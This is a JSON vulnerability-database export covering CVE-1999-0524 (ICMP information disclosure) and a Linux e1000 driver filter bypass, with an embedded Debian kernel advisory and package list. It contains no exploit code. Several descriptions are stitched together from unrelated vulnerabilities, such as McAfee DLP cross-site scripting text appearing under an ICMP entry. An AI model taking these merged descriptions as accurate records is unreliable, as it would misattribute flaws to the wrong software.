            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "VHN-522",
            "impactScore": 0.0,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:N/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-1999-0524",
            "trust": 1.0,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-199708-003",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULHUB",
            "id": "VHN-522",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-522"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0524"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199708-003"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "ICMP information such as (1) netmask and (2) timestamp is allowed from arbitrary hosts. McAfee Data Loss Prevention (DLP) is a set of data loss prevention solutions from McAfee. The solution protects intellectual property and ensures compliance by protecting the environment in which sensitive data resides (on-premise, in the cloud, or on the endpoint). \nCross-site scripting vulnerabilities and cross-site request forgery vulnerabilities exist in McAfee DLP. When the user browses the affected website, his browser will execute any script code provided by the attacker, which may cause the attacker to steal cookie-based authentication, perform unauthorized operations, leak or modify sensitive information, or other forms may exist. s attack. Other attacks may also be possible",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-1999-0524"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201308-265"
      },
      {
        "db": "BID",
        "id": "61811"
      },
      {
        "db": "VULHUB",
        "id": "VHN-522"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "MCAFEE",
        "id": "SB10053",
        "trust": 2.0
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0524",
        "trust": 1.7
      },
      {
        "db": "JUNIPER",
        "id": "JSA10705",
        "trust": 1.7
      },
      {
        "db": "OSVDB",
        "id": "95",
        "trust": 1.7
      },
      {
        "db": "BID",
        "id": "61811",
        "trust": 0.9
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199708-003",
        "trust": 0.7
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201308-265",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-522",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-522"
      },
      {
        "db": "BID",
        "id": "61811"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0524"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199708-003"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201308-265"
      }
    ]
  },
  "id": "VAR-199708-0008",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-522"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:28:35.912000Z",
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.1
      },
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-522"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0524"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10053"
      },
      {
        "trust": 1.7,
        "url": "http://descriptions.securescout.com/tc/11010"
      },
      {
        "trust": 1.7,
        "url": "http://descriptions.securescout.com/tc/11011"
      },
      {
        "trust": 1.7,
        "url": "http://www.osvdb.org/95"
      },
      {
        "trust": 1.7,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/306"
      },
      {
        "trust": 1.7,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/322"
      },
      {
        "trust": 1.6,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10705"
      },
      {
        "trust": 1.6,
        "url": "http://kb.vmware.com/selfservice/microsites/search.do?cmd=displaykc\u0026externalid=1434"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/61811"
      },
      {
        "trust": 0.3,
        "url": "http://www.mcafee.com/us/products/data-protection/data-loss-prevention.aspx"
      },
      {
        "trust": 0.1,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10705"
      },
      {
        "trust": 0.1,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10053"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/selfservice/microsites/search.do?cmd=displaykc\u0026amp;externalid=1434"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-522"
      },
      {
        "db": "BID",
        "id": "61811"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0524"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199708-003"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201308-265"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-522"
      },
      {
        "db": "BID",
        "id": "61811"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0524"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199708-003"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201308-265"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "1997-08-01T00:00:00",
        "db": "VULHUB",
        "id": "VHN-522"
      },
      {
        "date": "2013-08-13T00:00:00",
        "db": "BID",
        "id": "61811"
      },
      {
        "date": "1997-08-01T04:00:00",
        "db": "NVD",
        "id": "CVE-1999-0524"
      },
      {
        "date": "1997-08-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-199708-003"
      },
      {
        "date": "2013-08-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201308-265"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-07-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-522"
      },
      {
        "date": "2013-08-13T00:00:00",
        "db": "BID",
        "id": "61811"
      },
      {
        "date": "2022-11-14T19:33:21.037000",
        "db": "NVD",
        "id": "CVE-1999-0524"
      },
      {
        "date": "2022-11-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-199708-003"
      },
      {
        "date": "2013-08-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201308-265"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-199708-003"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel Information disclosure vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-199708-003"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "information disclosure",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-199708-003"
      }
    ],
    "trust": 0.6
  }
}

var-200906-0612
Vulnerability from variot

drivers/net/e1000/e1000_main.c in the e1000 driver in the Linux kernel 2.6.32.3 and earlier handles Ethernet frames that exceed the MTU by processing certain trailing payload data as if it were a complete frame, which allows remote attackers to bypass packet filters via a large packet with a crafted payload. NOTE: this vulnerability exists because of an incorrect fix for CVE-2009-1385. The Linux e1000 driver is prone to a security-bypass vulnerability. An attacker can exploit this issue to cause network traffic to be misinterpreted, which may allow the attacker to bypass intended security restrictions or launch further attacks. NOTE: A related vulnerability is documented as BID 35185 (Linux Kernel 'e1000/e1000_main.c' Remote Denial of Service Vulnerability), but that issue doesn't address all possible scenarios. The Linux kernel is the kernel used by the open source operating system Linux released by the American Linux Foundation. The NFSv4 implementation is one of the distributed file system protocols. Although security support for 'etch' officially ended on Feburary 15th, 2010, this update was already in preparation before that date. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2009-2691

Steve Beattie and Kees Cook reported an information leak in the
maps and smaps files available under /proc. Local users may be
able to read this data for setuid processes while the ELF binary
is being loaded.

CVE-2009-2695

Eric Paris provided several fixes to increase the protection
provided by the mmap_min_addr tunable against NULL pointer
dereference vulnerabilities.

CVE-2009-3080

Dave Jones reported an issue in the gdth SCSI driver. A missing
check for negative offsets in an ioctl call could be exploited by
local users to create a denial of service or potentially gain
elevated privileges.

CVE-2009-3726

Trond Myklebust reported an issue where a malicious NFS server
could cause a denial of service condition on its clients by
returning incorrect attributes during an open call.

CVE-2009-3889

Joe Malicki discovered an issue in the megaraid_sas driver. 
Insufficient permissions on the sysfs dbg_lvl interface allow
local users to modify the debug logging behavior.

CVE-2009-4005

Roel Kluin discovered an issue in the hfc_usb driver, an ISDN
driver for Colognechip HFC-S USB chip.

CVE-2009-4020

Amerigo Wang discovered an issue in the HFS filesystem that would
allow a denial of service by a local user who has sufficient
privileges to mount a specially crafted filesystem. Avati discovered an issue in the fuse subsystem. If the
system is sufficiently low on memory, a local user can cause the
kernel to dereference an invalid pointer resulting in a denial of
service (oops) and potentially an escalation of privileges.

CVE-2009-4138

Jay Fenlason discovered an issue in the firewire stack that allows
local users to cause a denial of service (oops or crash) by making
a specially crafted ioctl call.

CVE-2009-4308

Ted Ts'o discovered an issue in the ext4 filesystem that allows
local users to cause a denial of service (NULL pointer
dereference). This option is disabled by
default.

CVE-2010-0007

Florian Westphal reported a lack of capability checking in the
ebtables netfilter subsystem. If the ebtables module is loaded,
local users can add and modify ebtables rules.

CVE-2010-0410

 Sebastian Krahmer discovered an issue in the netlink connector
 subsystem that permits local users to allocate large amounts of
 system memory resulting in a denial of service (out of memory).

CVE-2010-0415

Ramon de Carvalho Valle discovered an issue in the sys_move_pages
interface, limited to amd64, ia64 and powerpc64 flavors in Debian.

CVE-2010-0622

Jermome Marchand reported an issue in the futex subsystem that
allows a local user to force an invalid futex state which results
in a denial of service (oops).

For the oldstable distribution (etch), this problem has been fixed in version 2.6.24-6~etchnhalf.9etch3.

We recommend that you upgrade your linux-2.6.24 packages.

Upgrade instructions


wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update will update the internal database apt-get upgrade will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch


Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.dsc Size/MD5 checksum: 5118 e05bb21e7655cbfa39aed8d4fd6842eb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.9etch3.diff.gz Size/MD5 checksum: 4099250 127bad8d653046d37fc52115d4e3a332 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af

Architecture independent packages:

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 4263554 6c56ff077d17eba766af47544ce0f414 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 83890 62cfd18ed176359831502e70d80b291a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 46871628 328ad30d3c07f90c56d821f76e186b40 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 1550090 1f114fdc3123f135017dbdcd0e4839c6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 1009878 c7b7abff092940a400703b9168e46daa http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.9etch3_all.deb Size/MD5 checksum: 98248 a2a391008f8855d8358d5f18d9d76044

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 329786 a212d2b3a94f8a04611c0f20d3d324b9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 27236282 b5bc553c4bf3a49843c45814fab72443 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 83428 f5f27b9de4905239e6315c77393f1f03 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-alpha_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 83454 5d152b5b6aa505982ebc7122a770b29b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-generic_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 26641900 c799e7d48937975036b46edf032ecd87 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 26620162 eb1c3c27f1ac81959dc0f2ab497aee35 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 3455268 da2d2cc2b7c4253ac408c30fcfddb28f http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-legacy_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 329788 f589f8815f7adf02f8884e2dd3ac613f http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-alpha-smp_2.6.24-6~etchnhalf.9etch3_alpha.deb Size/MD5 checksum: 329336 14bf085655b30adc8ab8f6ed4207d415

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 19482308 c49d2962c1a391fb00fb1b5f0598b24e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 3656476 f2f5de65037664d03208fcea83bf2ee2 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 83422 600c7216143f43f9c61b0c2ccd118ea0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 83434 36f1d8f21ec39a473536dbeda2332e62 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_amd64.deb Size/MD5 checksum: 346940 d3f12fdd61f90749fdd08d857b326327

arm architecture (ARM)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 9357734 3e1165a0795d7db5f7ed8ef84205064b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-footbridge_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 298744 50d8bfa3c06134e190409399a36c5aa9 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 83546 1742ab93afadd1827009bf1d714e76eb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-arm_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 83578 07906e33f9ad267d986991c93eef1048 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 10778670 cc38a718ad5fd1c6e92d23e416610bd6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-iop32x_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 308138 34dbc7720b1844833f0b71aa307c37fa http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 310714 6a2c6fbbc1dd000b8a532227e3b8b5ae http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 3939512 91c2ba626e754fe407d6dcf3fa01337a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-ixp4xx_2.6.24-6~etchnhalf.9etch3_arm.deb Size/MD5 checksum: 10786892 4d44a4ff751969855a01ad754a7c2b22

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 14375048 fe6ed4dea09aa205d801476667ef03cb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 13847788 4adc3106a987d84e12215156a379f460 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 259624 ac09dcabb624984b7321a5f6b6dbef54 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-hppa_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 83578 e152e18748e5c80b6d06715db836cf83 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 260838 44bc8ad5796c124b53d85a8c3a4ed912 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 262420 ff0641f04c409dd606c34373e8e16269 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc64-smp_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 14830990 cce09e8022bee915dcde5dd8b9525428 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 13333594 a4dc863b0c84b9006c723db9a581c92e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 83546 990eb24056c7f6a63a4d55ec39563bae http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 3446386 6ebfa4544252648df48cfb085cc3d2cc http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-parisc_2.6.24-6~etchnhalf.9etch3_hppa.deb Size/MD5 checksum: 258962 75184bed1f0b42cd8e002f93ed42198a

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 3656680 c5499cb98cdcdcadc48e3aa5bdf1d379 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 19214268 e3f564cae5a85355f4b5a9248a11af98 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 19148424 dd1d713c896888370a1667a16571c08c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 346982 6a6a08f74f9690705e6d770d1f3f2566 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-486_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 359548 b10fe011746b0df5fbd2587292af34ae http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-amd64_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 19482314 5d9cc150e340aea40e253a757cfdc423 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-i386_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 83452 32a1614212e964a4423b161b34cd758d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 19213598 4f459c2d2cdb87a6f945cbee7d4500d4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686-bigmem_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 358212 58ba32b0701643f043ab38a487cae609 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 83424 c1e8493aff96df5b0fe33f5af4686f98 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-686_2.6.24-6~etchnhalf.9etch3_i386.deb Size/MD5 checksum: 358752 4e3e9ef18a14fd191444591df571f80c

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 3569470 9ae824064bfc785f4b3512db78119e46 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 32206374 badd40dd68e2c6634c65f79d9536e34d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 83432 64a48fa9283b1741e22f0a22dbb93b20 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-ia64_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 83456 235a5572d5e109a4b575080a8262dc57 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-mckinley_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 319938 d7dc0120458e93119879dcdd1e48017e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 32025762 7595d7dc21d3273f46b35b8c00b0e195 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-itanium_2.6.24-6~etchnhalf.9etch3_ia64.deb Size/MD5 checksum: 320226 34731a37b519d726b133093e04d937c3

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 22243472 532341ea0847ea19414413f7659ff13d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 248638 ce9da5c377d6328e9bb9be1c3945fff8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 12001172 817c44fd5afbeef1b9f172522ff21bcb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-r4k-ip22_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 10553972 20ddd95631b93efd52ae0aa38a5cd6d4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-mips_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 83600 a7b66d71779dea207a3d49cb9f692fdb http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 27858364 54998117445c20f413331d1197355745 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 17212542 bf6c996fd387eef151e0db60d1bd00f2 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-5kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 313302 314b57dc807eb91f617c10b1497e1617 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-4kc-malta_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 314602 2c127076bf189be2836a4c3a4c7736af http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 3804368 fbcb3bdd668db166ad3f08e6dbfbc6e0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 17194888 9bce41a8b9936a16a3aa9cca675b9638 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 83540 8acdb1b4a4bc57f55b9cc5b2b04043a4 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-r5k-ip32_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 229412 0b93c7c909eca04fad4fa45e3e73e96c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a_2.6.24-6~etchnhalf.9etch3_mips.deb Size/MD5 checksum: 248700 13266a2acd5fcbd75d11049dd5e5ad58 